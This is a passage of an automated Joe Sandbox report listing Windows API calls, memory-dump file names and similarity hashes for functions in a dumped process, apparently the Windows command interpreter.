                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001B9BB8
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001B9BCB
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 001B9BF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                           • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$Last
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1725644760-0
APIs
• RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 001BB717
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 001BB72A
• RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 001BB7FC
  • Part of subcall function 00198235: _get_osfhandle.MSVCRT ref: 0019824E
  • Part of subcall function 00198235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00198256
  • Part of subcall function 00198235: _get_osfhandle.MSVCRT ref: 00198264
  • Part of subcall function 00198235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019826C
• memset.MSVCRT ref: 001BB76D
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 001BB788
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
• String ID: <
• API String ID: 1664749912-4251816714
• Opcode ID: ee5fa665b5898c385feb303c97c2c14385bcbbbfa7042aa089199f0dd5ddf300
• Instruction ID: 7965f206aca9351c45bfb1fa3bc43a2df4162db19810af7ff0a3afe9e6b829bf
• Opcode Fuzzy Hash: ee5fa665b5898c385feb303c97c2c14385bcbbbfa7042aa089199f0dd5ddf300
• Instruction Fuzzy Hash: 3A312E75D01209AFCB11DFA9D8859DEBBF8EF88344F104016E815E7751EB709A45CB61
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00194D66
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00194D8A
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00194D95
Similarity
• API ID: CloseOpenQueryValue
• String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR$p~du
• API String ID: 3677997916-4160248025
• Opcode ID: 8132b6dd298b11a67795e99f25d12150032dd8e55f3d2fde5ca3e547ce089daf
• Instruction ID: 412f047ff928e61ad7c9c3feecd4df059fec958937f2cf48eccfef2db200b357
• Opcode Fuzzy Hash: 8132b6dd298b11a67795e99f25d12150032dd8e55f3d2fde5ca3e547ce089daf
• Instruction Fuzzy Hash: 9B011976A41218BBDF21DBD5DC49FEEBBF8EB94750F100566EA02A2144D370AA42DA50
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 00198203
• GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 0019820E
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 00198229
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0C1
• fprintf.MSVCRT ref: 001AB0D5
• fflush.MSVCRT ref: 001AB0E3
Similarity
• API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 4271573189-0
• Opcode ID: ab8cdbeb6ea4260e1d814b16d42835578dc1bd591a1df47ebb7a5f326f3c480a
• Instruction ID: 66f1a63a03c1ad12d620ab4bacc1a5c6b1f277ea19412f33307918898d13de04
• Opcode Fuzzy Hash: ab8cdbeb6ea4260e1d814b16d42835578dc1bd591a1df47ebb7a5f326f3c480a
• Instruction Fuzzy Hash: 6A01A230107210FFDB00ABA8ED0EEDA7BACAF06315F500246F421925F1CBB54680DB62
APIs
• memset.MSVCRT ref: 001A3D30
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 001A3E3D
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 001A3E88
Similarity
• API ID: memset$FullNamePath
• String ID:
• API String ID: 3158150540-0
• Opcode ID: 2e9e48552ac3bdcfcb16ee19bb073dc33e7f582c66b3b9dc88d0f080100bc79a
• Instruction ID: 1bd42cf8aba6d544506897a59875f681cefc1180e3d56a4f091cfb75eac8e07d
• Opcode Fuzzy Hash: 2e9e48552ac3bdcfcb16ee19bb073dc33e7f582c66b3b9dc88d0f080100bc79a
• Instruction Fuzzy Hash: 6802C439A011159BCB29DFA8DC957B9B3B1FF49310F1881EDE80A97294D734AE82CF50
APIs
• _get_osfhandle.MSVCRT ref: 001A858D
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A8595
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 001A85D4
• _get_osfhandle.MSVCRT ref: 001A85ED
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A85F5
Similarity
• API ID: Console$Write_get_osfhandle$Mode
• String ID:
• API String ID: 1066134489-0
• Opcode ID: b021ec55864aa2685786547b78c4dc1bb08781c98c8172de68e9d8ad68d61875
• Instruction ID: 003850e72884f045a768e4464c219fbe0d9f108ff8ae82fc5b9d83eb906fb93d
• Opcode Fuzzy Hash: b021ec55864aa2685786547b78c4dc1bb08781c98c8172de68e9d8ad68d61875
• Instruction Fuzzy Hash: 3341D175E002109BDF28EF78D989AAEB3A5EF55308F14456AEC06DB185EF70DD41CA50
APIs
• _tell.MSVCRT ref: 0019B7F9
• _close.MSVCRT ref: 0019B82C
• memset.MSVCRT ref: 0019B8CC
• GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0019B936
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 0019B947
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 0019B96D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1380661413-0
                                                                                                                                                                                                                          • Opcode ID: 74d8db952cd2193627f4cd175784698d115aca14c3a07ff537719c9adda1a264
                                                                                                                                                                                                                          • Instruction ID: 82266e1a4b968af799066df4a2f6b4b2ccc118284fb51e240f93fb1dae808458
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74d8db952cd2193627f4cd175784698d115aca14c3a07ff537719c9adda1a264
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB4126709093008FDF34DF68E98872ABBE6BF95314F14092DE895976A0E734DC85CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00197F7C
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00197FC0
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00197FF3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 0019800C
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 001AB05A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveInformationTypeVolume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 285405857-0
                                                                                                                                                                                                                          • Opcode ID: 35d53826b8d32b5b009320391ae0c477e95a5a85ba141a326a16bf8a188cbefe
                                                                                                                                                                                                                          • Instruction ID: 42e013a62ec618cd8b1625b76fdf34dfc772a830a8b3bc3b65144ffc763896ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35d53826b8d32b5b009320391ae0c477e95a5a85ba141a326a16bf8a188cbefe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D318E72A01249ABDF24DFA4DC84AEF77B8FF0A344F04056AF401E2150DB38DA84CB21
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,001D0AF0,00000002,?,?,001AA669,%s %s ,?,?,00000000), ref: 001999DC
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001999EC
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001AA669,%s %s ,?,?,00000000), ref: 001999F4
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 00199A09
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4057327938-0
                                                                                                                                                                                                                          • Opcode ID: f1674ca1d5c28839f953c6318fd3395f97a897707124fb0266f1afa4722acd2c
                                                                                                                                                                                                                          • Instruction ID: b7592af8f38ac698b7dddbae90aed8fa4dc2e35a41e541df6356651055cdf9d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1674ca1d5c28839f953c6318fd3395f97a897707124fb0266f1afa4722acd2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21E73A745311ABDB28ABB95D8AB7A2358DF55755F25003FF606D62C1EFA0CC0181A1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001D0AF0,?,?,00000000), ref: 001AC0BC
                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,00001000,001CA7F0,00002000,00000000,00000000,001D0AEE), ref: 001AC0DC
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,00000000,?,00000000), ref: 001AC0FA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3249344982-0
                                                                                                                                                                                                                          • Opcode ID: 3967bda32c0ec1ef592cdfa3025e134ea58b87c54ddb6b67bd095e7f3eeddda4
                                                                                                                                                                                                                          • Instruction ID: 46c6412c817f4bafc7e01e17c50d71587edeb6df320026fd15d9a3b833ec7bef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3967bda32c0ec1ef592cdfa3025e134ea58b87c54ddb6b67bd095e7f3eeddda4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221A171A42205BFEF208F68AC49F7B7B7DEB04750F504029F902E2190E7749D40C761
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
• _wcsicmp.MSVCRT ref: 001B75AC
• _wcsicmp.MSVCRT ref: 001B75CB
• _wcsicmp.MSVCRT ref: 001B75F1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$iswspace
• String ID: KEYS$LIST$OFF
• API String ID: 3924973218-4129271751
• Opcode ID: 1a615f488e3ee597f4445c9ebd15cf002357589867c88ef31508b6109eb03b1e
• Instruction ID: 68942589de121d65316804f2c7b1c61f709beff2509fd8001877dd3e046d5a83
• Opcode Fuzzy Hash: 1a615f488e3ee597f4445c9ebd15cf002357589867c88ef31508b6109eb03b1e
• Instruction Fuzzy Hash: C1117F3160D701ABE739A729EC8ACF773A8FFD4720365402FF506960C0EFA05A8182A5
APIs
• _get_osfhandle.MSVCRT ref: 0019DDA3
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0019DDD6
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000001), ref: 0019DDE5
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0019DDF0
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019DDF9
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 62c880a7190024a0c95d2685ff632b6e21b6cf093608898045a64058509a6b39
• Instruction ID: b19c63e12885147cb2321f2d91cfdceacae7c26f2612ae9352e5e6b364a0f03a
• Opcode Fuzzy Hash: 62c880a7190024a0c95d2685ff632b6e21b6cf093608898045a64058509a6b39
• Instruction Fuzzy Hash: 5C110633C05214ABDF1187F8BD4CB7A3BE8EB46368F250616E815E28E0D7348D418A91
APIs
• _get_osfhandle.MSVCRT ref: 00199A1C
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: d03c4ca9ad2a3177cf0222c0871016028257cc289e7f116f2ac424673708c0b9
• Instruction ID: c8b2c99ed7f8d052ed02a28d2b2d7c654c7355cfda8eae0617dbf8a51a0171de
• Opcode Fuzzy Hash: d03c4ca9ad2a3177cf0222c0871016028257cc289e7f116f2ac424673708c0b9
• Instruction Fuzzy Hash: 470186338060206B8E21977D9D4DD7E3B6CDB86775B65032AF837E35D0DB348D429592
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• memset.MSVCRT ref: 001AD954
• longjmp.MSVCRT(001D0A70,000000FF,00000000,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD96D
• memcpy.MSVCRT(?,00000000,00002000,00000000,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD987
• longjmp.MSVCRT(001D0A70,000000FF,001C25C2,001C25C0,?,?,?,?,0019D980), ref: 001AD9D3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heaplongjmp$AllocProcessmemcpymemset
• String ID: 0123456789
• API String ID: 2034586978-2793719750
• Opcode ID: 7852fb3263487aabc12c8126bbf7f551e1059ff3ef109e1a4ece98bcb67106de
• Instruction ID: 574e54ab9d7f234d14c9235f3ba9890ead46814264f057bb7f5f9c6e76c48804
• Opcode Fuzzy Hash: 7852fb3263487aabc12c8126bbf7f551e1059ff3ef109e1a4ece98bcb67106de
• Instruction Fuzzy Hash: 01712535B002069BDF149F68EC45B6E77A1EF85300F68816DE846A7788EB71DD46CB90
APIs
• memset.MSVCRT ref: 00195074
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0019515F
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
  • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
• iswspace.MSVCRT ref: 001A9289
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcschr$iswspacememset
• String ID: %s
• API String ID: 2220997661-3043279178
• Opcode ID: ba432d62c7223dd62de96321922292fa57890afb587b097f4a063d12b526c5fa
• Instruction ID: 72a76268178982195499660e2c63ec802693b655c633d87ed6a53561db8fb90c
• Opcode Fuzzy Hash: ba432d62c7223dd62de96321922292fa57890afb587b097f4a063d12b526c5fa
• Instruction Fuzzy Hash: 2051F475A01212ABCF24DFA89C4167EB3F5FF59300F28406EE845E7240EB309E81CB91
APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 001B7121
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 001B7197
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001B71FF
Strings
• Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 001B70EE
• %WINDOWS_COPYRIGHT%, xrefs: 001B7107
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
